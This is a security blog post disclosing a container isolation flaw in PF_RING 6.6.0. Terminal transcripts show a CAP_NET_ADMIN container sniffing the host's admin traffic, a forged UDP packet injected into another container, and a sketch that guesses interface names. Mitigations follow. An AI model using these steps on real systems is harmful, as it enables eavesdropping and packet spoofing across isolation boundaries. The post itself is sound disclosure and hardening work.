Linux hardening and proper isolation using containerization can be tricky, especially when performance is critical. We recently helped a client design a secure network appliance that involves sniffing network traffic. This device has strict security and performance constraints. This post shares our feedback on the unlikely integration of fast sniffers with Linux containers.

Context

Let's consider a network appliance running Linux that uses PF_RING to lift packets from the NIC and feed them to sniffers isolated in containers.

PF_RING is a faster alternative to classic RAW socket sniffing. In a nutshell, packets coming from the NIC driver are put in a circular buffer without any processing. The sniffer then maps the buffer into userspace with mmap() to access the network packets.
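The circular buffer idea can be illustrated with a toy model. The sketch below is not PF_RING's actual memory layout or API: the `PacketRing` class, its slot format and its drop-when-full policy are assumptions made purely for illustration. It only shows how a producer (the driver side) and a consumer (the sniffer) can share a fixed number of slots.

```python
from collections import namedtuple

# Hypothetical slot format: the frame length followed by the raw bytes.
Slot = namedtuple("Slot", ["length", "data"])


class PacketRing:
    """Toy single-producer/single-consumer ring of fixed-size slots."""

    def __init__(self, num_slots):
        self.slots = [None] * num_slots
        self.head = 0      # next slot the producer (driver side) writes
        self.tail = 0      # next slot the consumer (sniffer) reads
        self.count = 0     # slots currently holding unread frames
        self.dropped = 0   # frames discarded because the ring was full

    def push(self, frame):
        """Producer side: store a raw frame, or drop it if the ring is full."""
        if self.count == len(self.slots):
            self.dropped += 1
            return False
        self.slots[self.head] = Slot(len(frame), frame)
        self.head = (self.head + 1) % len(self.slots)
        self.count += 1
        return True

    def pop(self):
        """Consumer side: return the oldest unread frame, or None if empty."""
        if self.count == 0:
            return None
        slot = self.slots[self.tail]
        self.tail = (self.tail + 1) % len(self.slots)
        self.count -= 1
        return slot.data


ring = PacketRing(num_slots=4)
for i in range(6):                 # six frames into four slots
    ring.push(bytes([i]) * 8)

received = []
while True:
    frame = ring.pop()
    if frame is None:
        break
    received.append(frame[0])

print(received, "dropped:", ring.dropped)
```

In this model the consumer never copies frames through a socket call; it simply walks the shared slots, which is the property that makes the mmap()-based approach attractive for fast sniffers.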

Considering the security hardening requirements of the appliance, the sniffer should be as isolated as possible. Isolation should have as little of a performance impact as possible. Containers are a pretty good fit for this use case.

Before version 7.0.0 (the latest release as of this writing), PF_RING didn't support network namespaces. The only way for the sniffers to access the circular packet buffer was to grant them the CAP_NET_ADMIN capability. Granting that capability to a "normal" hardened container isn't great, but with PF_RING it's worse...

Example architecture

Consider the following design for a dummy network sniffer:

[Figure: Dummy IDS design]

To quickly troubleshoot things, all containers are fully fledged Ubuntu distributions. In a real-life scenario, the ids-container would be minimal and hardened. LXC v2 is used, but the setup could be replicated with the container provider of your choice.

The host system has 2 network interfaces:

administration is performed on the secure LAN if-admin

sniffing is possible on the interface if-sniff

root@host:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: if-admin: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 52:54:00:4c:97:df brd ff:ff:ff:ff:ff:ff
    inet 192.168.122.221/24 brd 192.168.122.255 scope global if-admin
       valid_lft forever preferred_lft forever
    inet6 fe80::5054:ff:fe4c:97df/64 scope link
       valid_lft forever preferred_lft forever
3: if-sniff: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 22:22:22:22:22:22 brd ff:ff:ff:ff:ff:ff
    inet 192.168.110.2/24 brd 192.168.110.255 scope global if-sniff
       valid_lft forever preferred_lft forever
    inet6 fe80::2022:22ff:fe22:2222/64 scope link
       valid_lft forever preferred_lft forever
4: br0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether fe:f8:d8:60:13:37 brd ff:ff:ff:ff:ff:ff
    inet 192.168.0.1/24 brd 192.168.0.255 scope global br0
       valid_lft forever preferred_lft forever
    inet6 fe80::4030:e8ff:fe9a:c32b/64 scope link
       valid_lft forever preferred_lft forever
6: veth89U9YK@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br0 state UP group default qlen 1000
    link/ether fe:f8:d8:60:13:37 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::fcf8:d8ff:fe60:1337/64 scope link
       valid_lft forever preferred_lft forever
root@host:~# ls -l /proc/self/ns/net
lrwxrwxrwx 1 root root 0 May 4 14:40 /proc/self/ns/net -> net:[4026531957]

veth89U9YK@if5 is the host-side end of the virtual Ethernet (veth) pair whose other end is internet0 in app-container.

app-container only exposes sensitive services on the interface if-admin:

root@app-container:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
5: internet0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 00:16:01:54:9a:34 brd ff:ff:ff:ff:ff:ff
    inet 192.168.0.2/24 brd 192.168.0.255 scope global internet0
       valid_lft forever preferred_lft forever
    inet6 fe80::216:1ff:fe54:9a34/64 scope link
       valid_lft forever preferred_lft forever
root@app-container:~# ls -al /proc/self/ns/net
lrwxrwxrwx 1 root root 0 May 4 12:48 /proc/self/ns/net -> net:[4026532250]
root@app-container:~# ss -tan
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port
LISTEN  0       5       192.168.0.2:8080    *:*

# The exposed service is reachable by the administrator
admin@it:~$ curl 192.168.122.221
Hello Admin
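The `net:[...]` values printed by `ls -l /proc/self/ns/net` identify the network namespace of the calling process: two processes share a network namespace only if these identifiers match. As a minimal sketch (the helper names `parse_ns_link`, `same_namespace` and `current_net_namespace` are ours, not part of any tool used in this post), the comparison can be scripted like this:

```python
import os
import re

# Link targets look like "net:[4026531957]": a namespace type and an inode.
NS_LINK = re.compile(r"^(\w+):\[(\d+)\]$")


def parse_ns_link(target):
    """Split a link target such as 'net:[4026531957]' into (type, inode)."""
    match = NS_LINK.match(target)
    if match is None:
        raise ValueError("unexpected namespace link: %r" % target)
    return match.group(1), int(match.group(2))


def same_namespace(link_a, link_b):
    """True when both link targets designate the same namespace."""
    return parse_ns_link(link_a) == parse_ns_link(link_b)


def current_net_namespace(pid="self"):
    """Read the network namespace link of a process (Linux only)."""
    return os.readlink("/proc/%s/ns/net" % pid)


host_ns = "net:[4026531957]"   # value shown in the host transcript
app_ns = "net:[4026532250]"    # value shown in the app-container transcript
print(same_namespace(host_ns, app_ns))
```

With the values from the transcripts, the comparison reports that the host and app-container live in different network namespaces, which is what the container setup is supposed to guarantee.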

ids-container does not have any interface configured as it accesses if-sniff through PF_RING with CAP_NET_ADMIN:

root@ids-container:~# ip a
1: lo: <LOOPBACK> mtu 65536 qdisc noop state DOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
root@ids-container:~# ls /sys/class/net/
lo
root@ids-container:~# grep ^Cap /proc/self/status
CapInh: 0000000000000000
CapPrm: 0000000000001000
CapEff: 0000000000001000
CapBnd: 0000000000001000
CapAmb: 0000000000000000
root@ids-container:~# capsh --decode=0000000000001000
0x0000000000001000=cap_net_admin
root@ids-container:~# ls -ls /proc/self/ns/net
0 lrwxrwxrwx 1 root root 0 May 4 12:52 /proc/self/ns/net -> net:[4026532310]

Communication between app-container and ids-container is not represented but let's say it's a channel not based on the networking stack.

On the host, the PF_RING kernel module is loaded with the default configuration and network interfaces are correctly detected:

root@host:~# insmod ./PF_RING-6.6.0/kernel/pf_ring.ko
root@host:~# grep -r . /sys/module/pf_ring/parameters/*
/sys/module/pf_ring/parameters/enable_debug:0
/sys/module/pf_ring/parameters/enable_frag_coherence:1
/sys/module/pf_ring/parameters/enable_ip_defrag:0
/sys/module/pf_ring/parameters/enable_tx_capture:1
/sys/module/pf_ring/parameters/force_ring_lock:0
/sys/module/pf_ring/parameters/min_num_slots:4096
/sys/module/pf_ring/parameters/perfect_rules_hash_size:4096
/sys/module/pf_ring/parameters/quick_mode:0
/sys/module/pf_ring/parameters/transparent_mode:0
root@host:~# cat /proc/net/pf_ring/info
PF_RING Version          : 6.6.0 (unknown)
Total rings              : 0

Standard (non ZC) Options
Ring slots               : 4096
Slot version             : 16
Capture TX               : Yes [RX+TX]
IP Defragment            : No
Socket Mode              : Standard
Cluster Fragment Queue   : 0
Cluster Fragment Discard : 0
root@host:~# ls -1 /proc/net/pf_ring/dev/
br0
if-admin
if-sniff
internet0
vethLXOGMB

Breaking namespace isolation

Everything looks good: we can sniff on the interface if-sniff from inside the ids-container.

root@ids-container:./PF_RING-6.6.0/userland/examples# ./pcount -i if-sniff
Capturing from if-sniff
[...]
=========================
Absolute Stats: [7 pkts rcvd][0 pkts dropped]
Total Pkts=7/Dropped=0.0 %
7 pkts [0.7 pkt/sec] - 398 bytes [0.00 Mbit/sec]
=========================
Actual Stats: 1 pkts [747.6 ms][1.34 pkt/sec]
=========================

This looks good, until you try to sniff the interface any from within the ids-container... and get the packets of if-admin.

root@ids-container:/# ./PF_RING-6.6.0/userland/examples/pcount -i any -v 2 -f 'tcp port 80'
Capturing from any
[...]
14:03:15.177815 [52:54:00:38:2D:01 -> 52:54:00:4C:97:DF] [TCP][192.168.122.1 -> 192.168.122.221] [caplen=133][len=133]
52 54 00 4C 97 DF 52 54 00 38 2D 01 08 00 45 00 00 77 D1 DE 40 00 40 06 F2 72 C0 A8 7A 01 C0 A8 7A DD D4 E0 00 50 9F 50 0F E1 22 04 08 77 50 18 00 E5 76 99 00 00 47 45 54 20 2F 20 48 54 54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 31 39 32 2E 31 36 38 2E 31 32 32 2E 32 32 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 63 75 72 6C 2F 37 2E 35 38 2E 30 0D 0A 41 63 63 65 70 74 3A 20 2A 2F 2A 0D 0A 0D 0A
# Decoded payload:
# GET / HTTP/1.1\r
# Host: 192.168.122.221\r
# User-Agent: curl/7.58.0\r
# Accept: */*\r
# \r
[...]
14:03:15.178253 [52:54:00:4C:97:DF -> 52:54:00:38:2D:01] [TCP][192.168.122.221 -> 192.168.122.1] [caplen=172][len=172]
52 54 00 38 2D 01 52 54 00 4C 97 DF 08 00 45 00 00 9E A3 5E 40 00 3F 06 21 CC C0 A8 7A DD C0 A8 7A 01 00 50 D4 E0 22 04 08 88 9F 50 10 30 50 19 00 E5 76 C0 00 00 53 65 72 76 65 72 3A 20 42 61 73 65 48 54 54 50 2F 30 2E 33 20 50 79 74 68 6F 6E 2F 32 2E 37 2E 36 0D 0A 44 61 74 65 3A 20 46 72 69 2C 20 30 34 20 4D 61 79 20 32 30 31 38 20 31 34 3A 30 33 3A 31 35 20 47 4D 54 0D 0A 43 6F 6E 74 65 6E 74 2D 74 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 74 65 78 74 0D 0A 0D 0A 48 65 6C 6C 6F 20 41 64 6D 69 6E 0A
# Decoded payload:
# Server: BaseHTTP/0.3 Python/2.7.6\r
# Date: Fri, 04 May 2018 14:03:15 GMT\r
# Content-type: application/text\r
# \r
# Hello Admin
[...]
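To double-check what the container was able to read, the hex dump of the first captured frame can be decoded by hand. The following sketch is an illustration only: the `parse_tcp_frame` helper is ours and it assumes an untagged Ethernet frame carrying IPv4 and TCP. It walks the Ethernet, IPv4 and TCP headers and recovers the administrator's HTTP request.

```python
import socket
import struct

# First frame printed by pcount in the capture on "any" (copied verbatim).
FRAME_HEX = """
52 54 00 4C 97 DF 52 54 00 38 2D 01 08 00 45 00 00 77 D1 DE 40 00 40 06
F2 72 C0 A8 7A 01 C0 A8 7A DD D4 E0 00 50 9F 50 0F E1 22 04 08 77 50 18
00 E5 76 99 00 00 47 45 54 20 2F 20 48 54 54 50 2F 31 2E 31 0D 0A 48 6F
73 74 3A 20 31 39 32 2E 31 36 38 2E 31 32 32 2E 32 32 31 0D 0A 55 73 65
72 2D 41 67 65 6E 74 3A 20 63 75 72 6C 2F 37 2E 35 38 2E 30 0D 0A 41 63
63 65 70 74 3A 20 2A 2F 2A 0D 0A 0D 0A
"""


def parse_tcp_frame(frame):
    """Decode an untagged Ethernet/IPv4/TCP frame into a small dict."""
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != 0x0800:
        raise ValueError("not an IPv4 frame")
    ip = frame[14:]
    ip_header_len = (ip[0] & 0x0F) * 4          # IHL is in 32-bit words
    ip_total_len = struct.unpack("!H", ip[2:4])[0]
    if ip[9] != 6:
        raise ValueError("not a TCP segment")
    tcp = ip[ip_header_len:ip_total_len]
    src_port, dst_port = struct.unpack("!HH", tcp[:4])
    tcp_header_len = (tcp[12] >> 4) * 4         # data offset, 32-bit words
    return {
        "src": socket.inet_ntoa(ip[12:16]),
        "dst": socket.inet_ntoa(ip[16:20]),
        "src_port": src_port,
        "dst_port": dst_port,
        "payload": tcp[tcp_header_len:],
    }


frame = bytes.fromhex("".join(FRAME_HEX.split()))
info = parse_tcp_frame(frame)
print(info["src"], "->", info["dst"], "port", info["dst_port"])
print(info["payload"].decode("ascii"))
```

The decoded addresses belong to the administration LAN (192.168.122.0/24), a network the ids-container has no interface on.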

Indeed, any should correspond to all interfaces available in the network namespace. However, this version of PF_RING doesn't support namespace isolation, so you get access to all of the host's network interfaces, effectively breaking the isolation.

Sniffing on a specific host network interface is also possible:

root@ids-container:/# ./PF_RING-6.6.0/userland/examples/pcount -i if-admin -v 2 -f 'tcp port 80'
Capturing from if-admin
14:05:37.490554 [52:54:00:38:2D:01 -> 52:54:00:4C:97:DF] [TCP][192.168.122.1 -> 192.168.122.221] [caplen=74][len=74]
52 54 00 4C 97 DF 52 54 00 38 2D 01 08 00 45 00 00 3C 63 6B 40 00 40 06 61 21 C0 A8 7A 01 C0 A8 7A DD D4 EC 00 50 BC 71 0A 5C 00 00 00 00 A0 02 72 10 76 5E 00 00 02 04 05 B4 04 02 08 0A DC 3A BF 3F 00 00 00 00 01 03 03 07
[...]

A slight complication: listing the host interfaces from inside the container isn't possible. The pfring_findalldevs() function in the userland library ends up using the results from pfring_mod_findalldevs(), which extracts the interface names from /proc/net/pf_ring/dev/<iface>/info. Unless the LXC configuration explicitly mounts this path into the container, which should never happen, the attacker has to guess the interface names. On systems running systemd/udev version 197 or later, which assign predictable names such as enp0s3 instead of eth0, a light brute force is required.

Loading the PF_RING module with the default configuration also allows writing packets to network interfaces.
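The name guessing mentioned above could look like the following sketch. Everything here is an assumption made for illustration: the candidate ranges are arbitrary, and `can_open` stands for a hypothetical probe (for instance, trying to open the interface with a PF_RING tool and checking whether it succeeds), which is stubbed out in the example.

```python
from itertools import product


def candidate_interface_names(max_index=4, max_bus=4, max_slot=8):
    """Yield plausible interface names, most common conventions first."""
    # Classic kernel names.
    for index in range(max_index):
        yield "eth%d" % index
    # systemd/udev predictable names: onboard devices (eno<index>),
    # hotplug slots (ens<slot>) and PCI location (enp<bus>s<slot>).
    for index in range(1, max_index + 1):
        yield "eno%d" % index
    for slot in range(max_slot):
        yield "ens%d" % slot
    for bus, slot in product(range(max_bus), range(max_slot)):
        yield "enp%ds%d" % (bus, slot)


def guess_interfaces(can_open, candidates=None):
    """Return the candidate names for which the probe succeeds."""
    if candidates is None:
        candidates = candidate_interface_names()
    return [name for name in candidates if can_open(name)]


# Stub probe standing in for a real attempt to open the interface.
reachable_on_host = {"eth0", "enp0s3"}
found = guess_interfaces(lambda name: name in reachable_on_host)
print(found)
```

Custom names such as if-admin or if-sniff would not be found by pattern generation alone; an attacker would need a word list for those, or could simply fall back to the any pseudo-interface shown earlier.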

root@host:~# grep TX /proc/net/pf_ring/info
Capture TX : Yes [RX+TX]

To demonstrate that an arbitrary packet can be injected from ids-container into app-container through PF_RING, a simple UDP packet is captured to a pcap file and later injected:

# Captured packet to inject
root@ids-container:~# tcpdump -XX -r UDP_test_packet.pcap
reading from file UDP_test_packet.pcap, link-type EN10MB (Ethernet)
16:48:13.894163 IP 192.168.122.1.54219 > 192.168.122.221.1234: UDP, length 5
        0x0000:  5254 004c 97df 5254 0038 2d01 0800 4500  RT.L..RT.8-...E.
        0x0010:  0021 2982 4000 4011 9b1a c0a8 7a01 c0a8  .!).@.@.....z...
        0x0020:  7add d3cb 04d2 000d 764e 4142 4344 0a    z.......vNABCD.

root@ids-container:./PF_RING-6.6.0/userland/examples# ./pfsend -f /UDP_test_packet.pcap -i internet0 -m 00:16:01:3b:aa:a7 -b 1 -v -S 192.168.0.3 -D 192.168.0.2 -z
Sending packets on internet0
Using PF_RING v.6.6.0
Read 47 bytes packet from pcap file /UDP_test_packet.pcap [0.0 Secs = 0 ticks@0hz from beginning]
Read 1 packets from pcap file /UDP_test_packet.pcap
Dumping statistics on /proc/net/pf_ring/stats/2737-internet0.16
[0] pfring_send(47) returned 47
TX rate: [current 7'751.93 pps/0.00 Gbps][average 7'751.93 pps/0.00 Gbps][total 1.00 pkts]
Sent 1 packets

# In `app-container`, the forged packet is received
root@app-container:/# tcpdump -vv -n -i internet0 -XX
tcpdump: listening on internet0, link-type EN10MB (Ethernet), capture size 262144 bytes
15:50:40.297378 IP (tos 0x0, ttl 64, id 10626, offset 0, flags [DF], proto UDP (17), length 33)
    192.168.0.3.54219 > 192.168.0.2.1234: [udp sum ok] UDP, length 5
        0x0000:  0016 013b aaa7 5254 0038 2d01 0800 4500  ...;..RT.8-...E.
        0x0010:  0021 2982 4000 4011 8ff4 c0a8 0003 c0a8  .!).@.@.........
        0x0020:  0002 d3cb 04d2 000d 175a 4142 4344 0a    .........ZABCD.
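Comparing the two hex dumps, the IPv4 header checksum changes from 0x9b1a in the captured packet to 0x8ff4 in the injected one, because the source and destination addresses were rewritten. The sketch below is not pfsend's code; it is our own minimal implementation of the standard Internet checksum, with helper names chosen for illustration, and it reproduces both values from the header bytes shown above.

```python
import socket
import struct


def ipv4_checksum(header):
    """One's-complement checksum of an IPv4 header, checksum field zeroed."""
    data = header[:10] + b"\x00\x00" + header[12:]
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold the carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def rewrite_addresses(header, src, dst):
    """Return a copy of the header with new addresses and a valid checksum."""
    patched = bytearray(header)
    patched[12:16] = socket.inet_aton(src)
    patched[16:20] = socket.inet_aton(dst)
    patched[10:12] = struct.pack("!H", ipv4_checksum(bytes(patched)))
    return bytes(patched)


# 20-byte IPv4 header of the captured UDP packet (from the tcpdump output).
captured = bytes.fromhex("450000212982400040119b1ac0a87a01c0a87add")

injected = rewrite_addresses(captured, "192.168.0.3", "192.168.0.2")
print(hex(ipv4_checksum(captured)), injected[10:12].hex())
```

A packet forged this way is indistinguishable, at the IP layer, from one legitimately sent by 192.168.0.3, which is why app-container accepts it without complaint.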

Mitigation

Upgrade to PF_RING 7.0.0: this release fixes the namespace isolation problem and introduces capture interface whitelisting. If upgrading is not possible, proper configuration of the kernel module and hardening of both the host and the containers can reduce the risk.

Additionally, "Capture TX" should be disabled if your sniffer doesn't use it.

root@host:~# insmod ./pf_ring.ko enable_tx_capture=0
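Whether the setting is actually in effect can be checked from the module parameters exposed under /sys/module/pf_ring/parameters, as listed earlier. The sketch below is a hypothetical audit helper (the function names and messages are ours) that flags a module loaded with TX capture still enabled.

```python
from pathlib import Path

PARAM_DIR = Path("/sys/module/pf_ring/parameters")


def read_parameters(param_dir=PARAM_DIR):
    """Return {name: value} for the module parameters, or {} if not loaded."""
    if not param_dir.is_dir():
        return {}
    return {
        entry.name: entry.read_text().strip()
        for entry in param_dir.iterdir()
        if entry.is_file()
    }


def audit(params):
    """Return a list of findings for a dict of pf_ring module parameters."""
    if "enable_tx_capture" not in params:
        return ["enable_tx_capture not found: is the pf_ring module loaded?"]
    if params["enable_tx_capture"] != "0":
        return ["enable_tx_capture is set: reload with enable_tx_capture=0"]
    return []


# Values taken from the default configuration shown earlier in this post.
default_config = {"enable_tx_capture": "1", "min_num_slots": "4096"}
hardened_config = {"enable_tx_capture": "0", "min_num_slots": "4096"}

print(audit(default_config))
print(audit(hardened_config))
```

On a real host, `audit(read_parameters())` would run the same check against the live module.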

Conclusion

We have seen that despite the use of containers, some external components don't support namespaces. In our setup, the isolated sniffer could in fact:

Monitor the administration network interface

Inject traffic to any network interface

Route packets between all network interfaces

Exfiltrate sniffed packets back to the attacker

The thing to remember here is that PF_RING is just one example. The same type of vulnerability might be found with netmap, DPDK, Snabbswitch, etc. "This is left as an exercise for the reader" ;)

Performance and security are not always such good friends.
